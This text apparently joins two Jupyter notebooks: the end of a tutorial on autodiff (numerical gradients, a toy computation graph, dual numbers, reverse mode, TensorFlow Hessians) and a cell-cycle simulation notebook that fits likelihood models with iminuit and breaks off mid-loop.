$\dfrac{\partial^2 f}{\partial y \partial y} = \dfrac{\partial (x^2 + 1)}{\partial y} = 0$
At x=3 and y=4, these Hessians are respectively 8, 6, 6, 0. Let's use the equations above to compute them:
```
def d2f(x, y):
return [2*y, 2*x], [2*x, 0]
d2f(3, 4)
```
Perfect, but this requires some mathematical work. It is not too hard in this case, but for a deep neural network, it is pratically impossible to compute the derivatives this way. So let's look at various ways to automate this!
# Numeric differentiation
Here, we compute an approxiation of the gradients using the equation: $\dfrac{\partial f}{\partial x} = \displaystyle{\lim_{\epsilon \to 0}}\dfrac{f(x+\epsilon, y) - f(x, y)}{\epsilon}$ (and there is a similar definition for $\dfrac{\partial f}{\partial y}$).
```
def gradients(func, vars_list, eps=0.0001):
partial_derivatives = []
base_func_eval = func(*vars_list)
for idx in range(len(vars_list)):
tweaked_vars = vars_list[:]
tweaked_vars[idx] += eps
tweaked_func_eval = func(*tweaked_vars)
derivative = (tweaked_func_eval - base_func_eval) / eps
partial_derivatives.append(derivative)
return partial_derivatives
def df(x, y):
return gradients(f, [x, y])
df(3, 4)
```
It works well!
The good news is that it is pretty easy to compute the Hessians. First let's create functions that compute the first order derivatives (also called Jacobians):
```
def dfdx(x, y):
return gradients(f, [x,y])[0]
def dfdy(x, y):
return gradients(f, [x,y])[1]
dfdx(3., 4.), dfdy(3., 4.)
```
Now we can simply apply the `gradients()` function to these functions:
```
def d2f(x, y):
return [gradients(dfdx, [3., 4.]), gradients(dfdy, [3., 4.])]
d2f(3, 4)
```
So everything works well, but the result is approximate, and computing the gradients of a function with regards to $n$ variables requires calling that function $n$ times. In deep neural nets, there are often thousands of parameters to tweak using gradient descent (which requires computing the gradients of the loss function with regards to each of these parameters), so this approach would be much too slow.
## Implementing a Toy Computation Graph
Rather than this numerical approach, let's implement some symbolic autodiff techniques. For this, we will need to define classes to represent constants, variables and operations.
```
class Const(object):
def __init__(self, value):
self.value = value
def evaluate(self):
return self.value
def __str__(self):
return str(self.value)
class Var(object):
def __init__(self, name, init_value=0):
self.value = init_value
self.name = name
def evaluate(self):
return self.value
def __str__(self):
return self.name
class BinaryOperator(object):
def __init__(self, a, b):
self.a = a
self.b = b
class Add(BinaryOperator):
def evaluate(self):
return self.a.evaluate() + self.b.evaluate()
def __str__(self):
return "{} + {}".format(self.a, self.b)
class Mul(BinaryOperator):
def evaluate(self):
return self.a.evaluate() * self.b.evaluate()
def __str__(self):
return "({}) * ({})".format(self.a, self.b)
```
Good, now we can build a computation graph to represent the function $f$:
```
x = Var("x")
y = Var("y")
f = Add(Mul(Mul(x, x), y), Add(y, Const(2))) # f(x,y) = x²y + y + 2
```
And we can run this graph to compute $f$ at any point, for example $f(3, 4)$.
```
x.value = 3
y.value = 4
f.evaluate()
```
Perfect, it found the ultimate answer.
## Computing gradients
The autodiff methods we will present below are all based on the *chain rule*.
Suppose we have two functions $u$ and $v$, and we apply them sequentially to some input $x$, and we get the result $z$. So we have $z = v(u(x))$, which we can rewrite as $z = v(s)$ and $s = u(x)$. Now we can apply the chain rule to get the partial derivative of the output $z$ with regards to the input $x$:
$ \dfrac{\partial z}{\partial x} = \dfrac{\partial s}{\partial x} \cdot \dfrac{\partial z}{\partial s}$
Now if $z$ is the output of a sequence of functions which have intermediate outputs $s_1, s_2, ..., s_n$, the chain rule still applies:
$ \dfrac{\partial z}{\partial x} = \dfrac{\partial s_1}{\partial x} \cdot \dfrac{\partial s_2}{\partial s_1} \cdot \dfrac{\partial s_3}{\partial s_2} \cdot \dots \cdot \dfrac{\partial s_{n-1}}{\partial s_{n-2}} \cdot \dfrac{\partial s_n}{\partial s_{n-1}} \cdot \dfrac{\partial z}{\partial s_n}$
In forward mode autodiff, the algorithm computes these terms "forward" (i.e., in the same order as the computations required to compute the output $z$), that is from left to right: first $\dfrac{\partial s_1}{\partial x}$, then $\dfrac{\partial s_2}{\partial s_1}$, and so on. In reverse mode autodiff, the algorithm computes these terms "backwards", from right to left: first $\dfrac{\partial z}{\partial s_n}$, then $\dfrac{\partial s_n}{\partial s_{n-1}}$, and so on.
For example, suppose you want to compute the derivative of the function $z(x)=\sin(x^2)$ at x=3, using forward mode autodiff. The algorithm would first compute the partial derivative $\dfrac{\partial s_1}{\partial x}=\dfrac{\partial x^2}{\partial x}=2x=6$. Next, it would compute $\dfrac{\partial z}{\partial x}=\dfrac{\partial s_1}{\partial x}\cdot\dfrac{\partial z}{\partial s_1}= 6 \cdot \dfrac{\partial \sin(s_1)}{\partial s_1}=6 \cdot \cos(s_1)=6 \cdot \cos(3^2)\approx-5.46$.
Let's verify this result using the `gradients()` function defined earlier:
```
from math import sin
def z(x):
return sin(x**2)
gradients(z, [3])
```
Look good. Now let's do the same thing using reverse mode autodiff. This time the algorithm would start from the right hand side so it would compute $\dfrac{\partial z}{\partial s_1} = \dfrac{\partial \sin(s_1)}{\partial s_1}=\cos(s_1)=\cos(3^2)\approx -0.91$. Next it would compute $\dfrac{\partial z}{\partial x}=\dfrac{\partial s_1}{\partial x}\cdot\dfrac{\partial z}{\partial s_1} \approx \dfrac{\partial s_1}{\partial x} \cdot -0.91 = \dfrac{\partial x^2}{\partial x} \cdot -0.91=2x \cdot -0.91 = 6\cdot-0.91=-5.46$.
Of course both approaches give the same result (except for rounding errors), and with a single input and output they involve the same number of computations. But when there are several inputs or outputs, they can have very different performance. Indeed, if there are many inputs, the right-most terms will be needed to compute the partial derivatives with regards to each input, so it is a good idea to compute these right-most terms first. That means using reverse-mode autodiff. This way, the right-most terms can be computed just once and used to compute all the partial derivatives. Conversely, if there are many outputs, forward-mode is generally preferable because the left-most terms can be computed just once to compute the partial derivatives of the different outputs. In Deep Learning, there are typically thousands of model parameters, meaning there are lots of inputs, but few outputs. In fact, there is generally just one output during training: the loss. This is why reverse mode autodiff is used in TensorFlow and all major Deep Learning libraries.
There's one additional complexity in reverse mode autodiff: the value of $s_i$ is generally required when computing $\dfrac{\partial s_{i+1}}{\partial s_i}$, and computing $s_i$ requires first computing $s_{i-1}$, which requires computing $s_{i-2}$, and so on. So basically, a first pass forward through the network is required to compute $s_1$, $s_2$, $s_3$, $\dots$, $s_{n-1}$ and $s_n$, and then the algorithm can compute the partial derivatives from right to left. Storing all the intermediate values $s_i$ in RAM is sometimes a problem, especially when handling images, and when using GPUs which often have limited RAM: to limit this problem, one can reduce the number of layers in the neural network, or configure TensorFlow to make it swap these values from GPU RAM to CPU RAM. Another approach is to only cache every other intermediate value, $s_1$, $s_3$, $s_5$, $\dots$, $s_{n-4}$, $s_{n-2}$ and $s_n$. This means that when the algorithm computes the partial derivatives, if an intermediate value $s_i$ is missing, it will need to recompute it based on the previous intermediate value $s_{i-1}$. This trades off CPU for RAM (if you are interested, check out [this paper](https://pdfs.semanticscholar.org/f61e/9fd5a4878e1493f7a6b03774a61c17b7e9a4.pdf)).
### Forward mode autodiff
```
Const.gradient = lambda self, var: Const(0)
Var.gradient = lambda self, var: Const(1) if self is var else Const(0)
Add.gradient = lambda self, var: Add(self.a.gradient(var), self.b.gradient(var))
Mul.gradient = lambda self, var: Add(Mul(self.a, self.b.gradient(var)), Mul(self.a.gradient(var), self.b))
x = Var(name="x", init_value=3.)
y = Var(name="y", init_value=4.)
f = Add(Mul(Mul(x, x), y), Add(y, Const(2))) # f(x,y) = x²y + y + 2
dfdx = f.gradient(x) # 2xy
dfdy = f.gradient(y) # x² + 1
dfdx.evaluate(), dfdy.evaluate()
```
Since the output of the `gradient()` method is fully symbolic, we are not limited to the first order derivatives, we can also compute second order derivatives, and so on:
```
d2fdxdx = dfdx.gradient(x) # 2y
d2fdxdy = dfdx.gradient(y) # 2x
d2fdydx = dfdy.gradient(x) # 2x
d2fdydy = dfdy.gradient(y) # 0
[[d2fdxdx.evaluate(), d2fdxdy.evaluate()],
[d2fdydx.evaluate(), d2fdydy.evaluate()]]
```
Note that the result is now exact, not an approximation (up to the limit of the machine's float precision, of course).
### Forward mode autodiff using dual numbers
A nice way to apply forward mode autodiff is to use [dual numbers](https://en.wikipedia.org/wiki/Dual_number). In short, a dual number $z$ has the form $z = a + b\epsilon$, where $a$ and $b$ are real numbers, and $\epsilon$ is an infinitesimal number, positive but smaller than all real numbers, and such that $\epsilon^2=0$.
It can be shown that $f(x + \epsilon) = f(x) + \dfrac{\partial f}{\partial x}\epsilon$, so simply by computing $f(x + \epsilon)$ we get both the value of $f(x)$ and the partial derivative of $f$ with regards to $x$.
Dual numbers have their own arithmetic rules, which are generally quite natural. For example:
**Addition**
$(a_1 + b_1\epsilon) + (a_2 + b_2\epsilon) = (a_1 + a_2) + (b_1 + b_2)\epsilon$
**Subtraction**
$(a_1 + b_1\epsilon) - (a_2 + b_2\epsilon) = (a_1 - a_2) + (b_1 - b_2)\epsilon$
**Multiplication**
$(a_1 + b_1\epsilon) \times (a_2 + b_2\epsilon) = (a_1 a_2) + (a_1 b_2 + a_2 b_1)\epsilon + b_1 b_2\epsilon^2 = (a_1 a_2) + (a_1b_2 + a_2b_1)\epsilon$
**Division**
$\dfrac{a_1 + b_1\epsilon}{a_2 + b_2\epsilon} = \dfrac{a_1 + b_1\epsilon}{a_2 + b_2\epsilon} \cdot \dfrac{a_2 - b_2\epsilon}{a_2 - b_2\epsilon} = \dfrac{a_1 a_2 + (b_1 a_2 - a_1 b_2)\epsilon - b_1 b_2\epsilon^2}{{a_2}^2 + (a_2 b_2 - a_2 b_2)\epsilon - {b_2}^2\epsilon} = \dfrac{a_1}{a_2} + \dfrac{a_1 b_2 - b_1 a_2}{{a_2}^2}\epsilon$
**Power**
$(a + b\epsilon)^n = a^n + (n a^{n-1}b)\epsilon$
etc.
Let's create a class to represent dual numbers, and implement a few operations (addition and multiplication). You can try adding some more if you want.
```
class DualNumber(object):
def __init__(self, value=0.0, eps=0.0):
self.value = value
self.eps = eps
def __add__(self, b):
return DualNumber(self.value + self.to_dual(b).value,
self.eps + self.to_dual(b).eps)
def __radd__(self, a):
return self.to_dual(a).__add__(self)
def __mul__(self, b):
return DualNumber(self.value * self.to_dual(b).value,
self.eps * self.to_dual(b).value + self.value * self.to_dual(b).eps)
def __rmul__(self, a):
return self.to_dual(a).__mul__(self)
def __str__(self):
if self.eps:
return "{:.1f} + {:.1f}ε".format(self.value, self.eps)
else:
return "{:.1f}".format(self.value)
def __repr__(self):
return str(self)
@classmethod
def to_dual(cls, n):
if hasattr(n, "value"):
return n
else:
return cls(n)
```
$3 + (3 + 4 \epsilon) = 6 + 4\epsilon$
```
3 + DualNumber(3, 4)
```
$(3 + 4ε)\times(5 + 7ε)$ = $3 \times 5 + 3 \times 7ε + 4ε \times 5 + 4ε \times 7ε$ = $15 + 21ε + 20ε + 28ε^2$ = $15 + 41ε + 28 \times 0$ = $15 + 41ε$
```
DualNumber(3, 4) * DualNumber(5, 7)
```
Now let's see if the dual numbers work with our toy computation framework:
```
x.value = DualNumber(3.0)
y.value = DualNumber(4.0)
f.evaluate()
```
Yep, sure works. Now let's use this to compute the partial derivatives of $f$ with regards to $x$ and $y$ at x=3 and y=4:
```
x.value = DualNumber(3.0, 1.0) # 3 + ε
y.value = DualNumber(4.0) # 4
dfdx = f.evaluate().eps
x.value = DualNumber(3.0) # 3
y.value = DualNumber(4.0, 1.0) # 4 + ε
dfdy = f.evaluate().eps
dfdx
dfdy
```
Great! However, in this implementation we are limited to first order derivatives.
Now let's look at reverse mode.
### Reverse mode autodiff
Let's rewrite our toy framework to add reverse mode autodiff:
```
class Const(object):
def __init__(self, value):
self.value = value
def evaluate(self):
return self.value
def backpropagate(self, gradient):
pass
def __str__(self):
return str(self.value)
class Var(object):
def __init__(self, name, init_value=0):
self.value = init_value
self.name = name
self.gradient = 0
def evaluate(self):
return self.value
def backpropagate(self, gradient):
self.gradient += gradient
def __str__(self):
return self.name
class BinaryOperator(object):
def __init__(self, a, b):
self.a = a
self.b = b
class Add(BinaryOperator):
def evaluate(self):
self.value = self.a.evaluate() + self.b.evaluate()
return self.value
def backpropagate(self, gradient):
self.a.backpropagate(gradient)
self.b.backpropagate(gradient)
def __str__(self):
return "{} + {}".format(self.a, self.b)
class Mul(BinaryOperator):
def evaluate(self):
self.value = self.a.evaluate() * self.b.evaluate()
return self.value
def backpropagate(self, gradient):
self.a.backpropagate(gradient * self.b.value)
self.b.backpropagate(gradient * self.a.value)
def __str__(self):
return "({}) * ({})".format(self.a, self.b)
x = Var("x", init_value=3)
y = Var("y", init_value=4)
f = Add(Mul(Mul(x, x), y), Add(y, Const(2))) # f(x,y) = x²y + y + 2
result = f.evaluate()
f.backpropagate(1.0)
print(f)
result
x.gradient
y.gradient
```
Again, in this implementation the outputs are just numbers, not symbolic expressions, so we are limited to first order derivatives. However, we could have made the `backpropagate()` methods return symbolic expressions rather than values (e.g., return `Add(2,3)` rather than 5). This would make it possible to compute second order gradients (and beyond). This is what TensorFlow does, as do all the major libraries that implement autodiff.
### Reverse mode autodiff using TensorFlow
```
import tensorflow as tf
tf.reset_default_graph()
x = tf.Variable(3., name="x")
y = tf.Variable(4., name="y")
f = x*x*y + y + 2
jacobians = tf.gradients(f, [x, y])
init = tf.global_variables_initializer()
with tf.Session() as sess:
init.run()
f_val, jacobians_val = sess.run([f, jacobians])
f_val, jacobians_val
```
Since everything is symbolic, we can compute second order derivatives, and beyond. However, when we compute the derivative of a tensor with regards to a variable that it does not depend on, instead of returning 0.0, the `gradients()` function returns None, which cannot be evaluated by `sess.run()`. So beware of `None` values. Here we just replace them with zero tensors.
```
hessians_x = tf.gradients(jacobians[0], [x, y])
hessians_y = tf.gradients(jacobians[1], [x, y])
def replace_none_with_zero(tensors):
return [tensor if tensor is not None else tf.constant(0.)
for tensor in tensors]
hessians_x = replace_none_with_zero(hessians_x)
hessians_y = replace_none_with_zero(hessians_y)
init = tf.global_variables_initializer()
with tf.Session() as sess:
init.run()
hessians_x_val, hessians_y_val = sess.run([hessians_x, hessians_y])
hessians_x_val, hessians_y_val
```
And that's all folks! Hope you enjoyed this notebook.
| github_jupyter |
```
import numpy as np
import scipy as sp
import pandas as pd
import warnings
import cython
%load_ext Cython
from iminuit import Minuit
idx = pd.IndexSlice
import matplotlib.pyplot as plt
%matplotlib inline
import clapy
import clasim
dargs = {
'nCells': 10000,
'mCells': 100,
'GF': 0.95,
'G1': 0.46,
'S': 0.33,
'G2M': 0.21,
'sCells' : 0.3,
'sSamples' : 0.2
}
a = clasim.run(seed=int(np.random.rand()*1000),mode=5,times=[0.0],samples=1000,**dargs)
```
# Data for time series and histogramms
```
asym_dist = clapy.dist()
asym_dist_gamma = clapy.dist_gamma()
dargs = {
'samples': 10000,
'nCells': 100,
'mCells': 100,
'GF': 0.95,
'G1': 0.46,
'S': 0.33,
'G2M': 0.21,
'sCells' : 0.3,
'sSamples' : 0.2
}
dargs_d = dargs.copy()
dargs_d['sSamples'] = 1e-6
dargs_d['sCells'] = 1e-6
dargs_sym = dargs.copy()
dargs_sym['nCells'] = 10000
dargs_sym_d = dargs_sym.copy()
dargs_sym_d['sSamples'] = 1e-6
dargs_sym_d['sCells'] = 1e-6
dTC = dargs['G1']+dargs['G2M']+dargs['S']
dFS = dargs['S']/dTC
X = np.arange(0,dargs['mCells']+1)
time_points = np.linspace(0.01,1.965625,22)
measure_times = np.ravel(np.array(time_points)[:,np.newaxis]*np.ones(dargs['samples']))
pdfs = list()
pdfm = list()
pdfstd = list()
pdfskw = list()
pdfs_gamma = list()
pdfm_gamma = list()
pdfstd_gamma = list()
pdfskw_gamma = list()
data_asy = list()
data_sym = list()
data_asy_d = list()
data_sym_d = list()
for t in time_points:
#simulations asymetric
data_asy.append(np.array(clasim.run(seed=int(np.random.rand()*1000),mode=1,times=[t],**dargs)) )
data_asy_d.append(np.array(clasim.run(seed=int(np.random.rand()*1000),mode=1,times=[t],**dargs_d)) )
#simulations symetric
data_sym.append(np.array(clasim.run(seed=int(np.random.rand()*1000),mode=2,times=[t],**dargs_sym)) )
data_sym_d.append(np.array(clasim.run(seed=int(np.random.rand()*1000),mode=2,times=[t],**dargs_sym_d)) )
#pdfs
pdfs.append( [asym_dist.pmf_f(dargs['mCells'],dTC,dFS,dargs['GF'],dargs['sCells'],dargs['sSamples'],t,i) for i in X] )
#means
pdfm.append( asym_dist.pmf_mean(dargs['mCells'],dTC,dFS,dargs['GF'],dargs['sCells'],dargs['sSamples'],t) )
pdfstd.append( asym_dist.pmf_std(dargs['mCells'],dTC,dFS,dargs['GF'],dargs['sCells'],dargs['sSamples'],t) )
pdfskw.append( asym_dist.pmf_skw(dargs['mCells'],dTC,dFS,dargs['GF'],dargs['sCells'],dargs['sSamples'],t) )
#pdfs
pdfs_gamma.append( [asym_dist_gamma.pmf_f(dargs['mCells'],dTC,dFS,dargs['GF'],dargs['sCells'],dargs['sSamples'],t,i) for i in X] )
#means
pdfm_gamma.append( asym_dist_gamma.pmf_mean(dargs['mCells'],dTC,dFS,dargs['GF'],dargs['sCells'],dargs['sSamples'],t) )
pdfstd_gamma.append( asym_dist_gamma.pmf_std(dargs['mCells'],dTC,dFS,dargs['GF'],dargs['sCells'],dargs['sSamples'],t) )
pdfskw_gamma.append( asym_dist_gamma.pmf_skw(dargs['mCells'],dTC,dFS,dargs['GF'],dargs['sCells'],dargs['sSamples'],t) )
with pd.HDFStore('data2.pandas',complevel=9) as st:
st['data_asy'] = pd.Series(data_asy,index=time_points,name='simulation asy')
st['data_sym'] = pd.Series(data_sym,index=time_points,name='simulation sym')
st['data_asy_d'] = pd.Series(data_asy_d,index=time_points,name='simulation asy no nois')
st['data_sym_d'] = pd.Series(data_sym_d,index=time_points,name='simulation sym no nois')
st['X'] = pd.Series(X,name='points for histogram')
st['pdfs'] = pd.Series(pdfs,index=time_points,name='pdf')
st['pdfm'] = pd.Series(pdfm,index=time_points,name='mean')
st['pdfstd'] = pd.Series(pdfstd,index=time_points,name='std')
st['pdfskw'] = pd.Series(pdfskw,index=time_points,name='skw')
st['pdfs_gamma'] = pd.Series(pdfs_gamma,index=time_points,name='pdf gamma')
st['pdfm_gamma'] = pd.Series(pdfm_gamma,index=time_points,name='mean gamma')
st['pdfstd_gamma'] = pd.Series(pdfstd_gamma,index=time_points,name='std gamma')
st['pdfskw_gamma'] = pd.Series(pdfskw_gamma,index=time_points,name='skw gamma')
```
# Gernerate data for parameter recovery
```
%%cython --force
# distutils: language = c++
#use --annotate if you wonder what kind of code it generates
cimport cython
import numpy as np
cimport numpy as np #overwritten those from python with cython
from libc.math cimport exp, M_PI, sqrt, log
from iminuit.util import describe, make_func_code
from libcpp.map cimport map
import scipy as sp
@cython.embedsignature(True)#dump the signatre so describe works
cpdef fitfunc(double t,double Tc,double r,double GF):
cdef double res = 0
if t<(Tc-Tc*r):
res = GF/Tc*(t+Tc*r)
else:
res = GF
return res
'''
@cython.embedsignature(True)#dump the signatre so describe works
cpdef double mypdf(double x, double mu, double std):
#cpdef means generate both c function and python function
cdef double norm = 1./(sqrt(2*M_PI*std))
cdef double ret = exp(-1*(x-mu)*(x-mu)/(2.*std))*norm
return ret
'''
@cython.embedsignature(True)#dump the signatre so describe works
cpdef double mypdfln(double x, double mu, double std):
#cpdef means generate both c function and python function
cdef double norm = (sqrt(2*M_PI*std*std))
cdef double ret = (-1*(x-mu)*(x-mu)/(2.*std*std))-log(norm)
return ret
cdef class Nowakowski_LH:
cdef np.ndarray data
cdef np.ndarray err
cdef np.ndarray t
cdef int ndata
def __init__(self,data,t):
self.data = data
self.t = t
self.ndata = len(data)
@cython.embedsignature(True)#you need this to dump function signature in docstring
def compute(self, double Tc,double r,double GF,double s):
#this line is a cast not a copy. Let cython knows mydata will spit out double
cdef np.ndarray[np.double_t, ndim=1] mydata = self.data
cdef np.ndarray[np.double_t, ndim=1] myt = self.t
cdef double loglh = 0.
cdef double lmu = 0.
cdef double ler = 0.
for i in range(self.ndata):
lmu = fitfunc(myt[i],Tc,r,GF)
loglh -= mypdfln(mydata[i],lmu,s)
return loglh
```
## with 5 samples
```
def do_old(num):
data = np.array(clasim.run(seed=3*num,mode=1,**default_args))
lh = Nowakowski_LH(data*1.0/default_args['mCells'],times)
#lh.compute(0.4,5,3)
mi_old = Minuit(lh.compute, Tc=1.0, r=0.3,GF=0.95,s=0.2,\
error_s=0.1,error_r=0.1,error_GF=0.1,error_Tc=0.1,\
limit_Tc=(0,2), limit_r=(0,1),limit_GF=(0,1),limit_s=(0,1),\
errordef=0.5,print_level=0)
mi_old.migrad(ncall=999999999);
s = dict(mi_old.values)
for ii in mi_old.errors:
s.update({ii+"_error" : mi_old.errors[ii]})
s.update({'model' : 'old'})
if calc_error:
try:
tmp = mi_old.minos(sigma=2)
for i in tmp:
s.update({i+'_hpd46_l' : tmp[i]['lower'] + mi_old.values[i] })
s.update({i+'_hpd46_u' : tmp[i]['upper'] + mi_old.values[i] })
except:
print('error in errorfind',s['model'])
return pd.Series(s,name=num)
def do_gamma(num):
data = np.array(clasim.run(seed=3*num+1,mode=1,**default_args))
lh = clapy.asym_lhgamma(data=data,times=times,ncell=default_args['mCells'])
mi_old = Minuit(lh.compute, Tc=1.0, r=0.3,GF=0.95,sigma_cell=0.3,sigma_sample=0.2,\
error_sigma_cell=0.1,error_r=0.1,error_GF=0.1,error_Tc=0.1,error_sigma_sample=0.1,\
limit_Tc=(0.00001,2), limit_r=(0.00001,1),limit_GF=(0,1),limit_sigma_cell=(0.00001,1),limit_sigma_sample=(0.00001,1),\
errordef=0.5,print_level=0)
mi_old.migrad();
s = dict(mi_old.values)
for ii in mi_old.errors:
s.update({ii+"_error" : mi_old.errors[ii]})
s.update({'model' : 'gamma'})
if calc_error:
try:
tmp = mi_old.minos(sigma=2)
for i in tmp:
s.update({i+'_hpd46_l' : tmp[i]['lower'] + mi_old.values[i] })
s.update({i+'_hpd46_u' : tmp[i]['upper'] + mi_old.values[i] })
except:
print('error in errorfind',s['model'])
return pd.Series(s,name=num)
def do_lognorm(num):
data = np.array(clasim.run(seed=3*num+2,mode=1,**default_args))
lh = clapy.asym_lh(data=data,times=times,ncell=default_args['mCells'])
mi_old = Minuit(lh.compute, Tc=1.0, r=0.3,GF=0.95,sigma_cell=0.3,sigma_sample=0.2,\
error_sigma_cell=0.1,error_r=0.1,error_GF=0.1,error_Tc=0.1,error_sigma_sample=0.1,\
limit_Tc=(0.00001,2), limit_r=(0.00001,1),limit_GF=(0,1),limit_sigma_cell=(0.00001,1),limit_sigma_sample=(0.00001,1),\
errordef=0.5,print_level=0)
mi_old.migrad();
s = dict(mi_old.values)
for ii in mi_old.errors:
s.update({ii+"_error" : mi_old.errors[ii]})
s.update({'model' : 'lognorm'})
if calc_error:
try:
tmp = mi_old.minos(sigma=2)
for i in tmp:
s.update({i+'_hpd46_l' : tmp[i]['lower'] + mi_old.values[i] })
s.update({i+'_hpd46_u' : tmp[i]['upper'] + mi_old.values[i] })
except:
print('error in errorfind',s['model'])
return pd.Series(s,name=num)
from multiprocessing import Pool
default_args = {
'samples': 5,
'nCells': 100,
'mCells': 100,
'GF': 0.95,
'G1': 0.46,
'S': 0.33,
'G2M': 0.21,
'sCells' : 0.3,
'sSamples' : 0.2
}
warnings.filterwarnings('ignore')
calc_error = False
timep=np.linspace(0.01,1.5,5)
default_args['times'] = timep
#default_args['samples'] = int(np.round(120/(mm)))
index = pd.MultiIndex.from_product([[],[]],names=['std','index'])
# Priors for unknown model parameters
times = np.hstack([np.ones(default_args['samples'])*t for t in timep])
tmplist = []
Ns = 50
with Pool(4) as p:
tmplist=tmplist+p.map(do_old,np.arange(Ns))
tmplist=tmplist+p.map(do_lognorm,np.arange(Ns))
tmplist=tmplist+p.map(do_gamma,np.arange(Ns))
stat5 = pd.DataFrame(tmplist)
stat5.rename({"GF":"GFf"}, axis="columns",inplace=True)
stat5.index.rename('N',inplace=True)
stat5['sSamples'] = 0.2
stat5['sCells'] = 0.3
stat5.set_index('sSamples', append=True, inplace=True)
stat5.set_index('sCells', append=True, inplace=True)
stat5.set_index('model', append=True, inplace=True)
stat5 = stat5.reorder_levels(['model','sSamples','sCells','N'])
warnings.filterwarnings('default')
stat5 = stat5.sort_index()
with pd.HDFStore('data_tmp.pandas',complib='zlib',complevel=9) as st:
st['minuit_full_new_s5_para'] = pd.Series(default_args)
st['minuit_full_new_s5'] = stat5
```
## with 100 samples
```
default_args = {
'samples': 100,
'nCells': 100,
'mCells': 100,
'GF': 0.95,
'G1': 0.46,
'S': 0.33,
'G2M': 0.21,
'sCells' : 0.3,
'sSamples' : 0.2
}
warnings.filterwarnings('ignore')
calc_error = False
timep=np.linspace(0.01,1.5,5)
#default_args['samples'] = int(np.round(120/(mm)))
default_args['times'] = timep
times = np.hstack([np.ones(default_args['samples'])*t for t in timep])
index = pd.MultiIndex.from_product([[],[]],names=['std','index'])
# Priors for unknown model parameters
tmplist = []
Ns = 50
with Pool(4) as p:
tmplist=tmplist+p.map(do_old,np.arange(Ns))
tmplist=tmplist+p.map(do_lognorm,np.arange(Ns))
tmplist=tmplist+p.map(do_gamma,np.arange(Ns))
stat100 = pd.DataFrame(tmplist)
stat100.rename({"GF":"GFf"}, axis="columns",inplace=True)
stat100.index.rename('N',inplace=True)
stat100['sSamples'] = 0.2
stat100['sCells'] = 0.3
stat100.set_index('sSamples', append=True, inplace=True)
stat100.set_index('sCells', append=True, inplace=True)
stat100.set_index('model', append=True, inplace=True)
stat100 = stat100.reorder_levels(['model','sSamples','sCells','N'])
warnings.filterwarnings('default')
stat100 = stat100.sort_index()
with pd.HDFStore('data_tmp.pandas',complib='zlib',complevel=9) as st:
st['minuit_full_new_s100_para'] = pd.Series(default_args)
st['minuit_full_new_s100'] = stat100
```
# 5 and 10000cells
```
default_args = {
'samples': 5,
'nCells': 1000,
'mCells': 1000,
'GF': 0.95,
'G1': 0.46,
'S': 0.33,
'G2M': 0.21,
'sCells' : 0.3,
'sSamples' : 0.2
}
warnings.filterwarnings('ignore')
calc_error = False
timep=np.linspace(0.01,1.5,5)
#default_args['samples'] = int(np.round(120/(mm)))
default_args['times'] = timep
times = np.hstack([np.ones(default_args['samples'])*t for t in timep])
index = pd.MultiIndex.from_product([[],[]],names=['std','index'])
# Priors for unknown model parameters
tmplist = []
Ns = 16
with Pool(4) as p:
tmplist=tmplist+p.map(do_old,np.arange(Ns))
tmplist=tmplist+p.map(do_lognorm,np.arange(Ns))
tmplist=tmplist+p.map(do_gamma,np.arange(Ns))
stat1000 = pd.DataFrame(tmplist)
stat1000.rename({"GF":"GFf"}, axis="columns",inplace=True)
stat1000.index.rename('N',inplace=True)
stat1000['sSamples'] = 0.2
stat1000['sCells'] = 0.3
stat1000.set_index('sSamples', append=True, inplace=True)
stat1000.set_index('sCells', append=True, inplace=True)
stat1000.set_index('model', append=True, inplace=True)
stat1000 = stat1000.reorder_levels(['model','sSamples','sCells','N'])
warnings.filterwarnings('default')
stat1000 = stat1000.sort_index()
with pd.HDFStore('data_tmp.pandas',complib='zlib',complevel=9) as st:
st['minuit_full_new_n1000_para'] = pd.Series(default_args)
st['minuit_full_new_n1000'] = stat1000
```
## for different initial conditions
```
default_args = {
'samples': 100,
'nCells': 100,
'mCells': 100,
'GF': 0.95,
'G1': 0.46,
'S': 0.33,
'G2M': 0.21,
'sCells' : 0.3,
'sSamples' : 0.2
}
warnings.filterwarnings('ignore')
calc_error = False
allim = []
sss = 0
SM = 928639
for start in np.linspace(0.01,0.2,19*1+1): #range(5,31,5):
for leng in np.linspace(0.5,2,15*1+1):
for n in range(10):
timep=np.linspace(start,start+leng,5)
times = np.hstack([np.ones(default_args['samples'])*t for t in timep])
data = np.array(clasim.run(seed=sss+SM,mode=1,times=timep,**default_args))
sss = sss+1
lh = Nowakowski_LH(data*1.0/default_args['mCells'],times)
mi_old = Minuit(lh.compute, Tc=1.0, r=0.3,GF=0.95,s=0.2,\
error_s=0.1,error_r=0.1,error_GF=0.1,error_Tc=0.1,\
limit_Tc=(0,2), limit_r=(0,1),limit_GF=(0,1),limit_s=(0,1),\
errordef=0.5,print_level=0)
mi_old.migrad(ncall=999999999);
s = dict(mi_old.values)
for ii in mi_old.errors:
s.update({ii+"_error" : mi_old.errors[ii]})
s.update({'N' : n})
if calc_error:
try:
tmp = mi_old.minos(sigma=2)
for i in tmp:
s.update({i+'_hpd46_l' : tmp[i]['lower'] + mi_old.values[i] })
s.update({i+'_hpd46_u' : tmp[i]['upper'] + mi_old.values[i] })
except:
print('error in errorfind',s['model'])
s.update({'leng' : leng})
s.update({'start' : start})
nowak = s.copy()
data = np.array(clasim.run(seed=sss+SM,mode=1,times=timep,**default_args))
sss = sss+1
lh = clapy.asym_lhgamma(data=data,times=times,ncell=default_args['mCells'])
mi_old = Minuit(lh.compute, Tc=1.0, r=0.3,GF=0.95,sigma_cell=0.3,sigma_sample=0.2,\
error_sigma_cell=0.1,error_r=0.1,error_GF=0.1,error_Tc=0.1,error_sigma_sample=0.1,\
limit_Tc=(0.00001,2), limit_r=(0.00001,1),limit_GF=(0,1),limit_sigma_cell=(0.00001,1),limit_sigma_sample=(0.00001,1),\
errordef=0.5,print_level=0)
mi_old.migrad();
s = dict(mi_old.values)
for ii in mi_old.errors:
s.update({ii+"_error" : mi_old.errors[ii]})
s.update({'N' : n})
s.update({'leng' : leng})
s.update({'start' : start})
if calc_error:
try:
tmp = mi_old.minos(sigma=2)
for i in tmp:
s.update({i+'_hpd46_l' : tmp[i]['lower'] + mi_old.values[i] })
s.update({i+'_hpd46_u' : tmp[i]['upper'] + mi_old.values[i] })
except:
print('error in errorfind',s['model'])
gamma = s.copy()
data = np.array(clasim.run(seed=sss+SM,mode=1,times=timep,**default_args))
sss = sss+1
lh = clapy.asym_lh(data=data,times=times,ncell=default_args['mCells'])
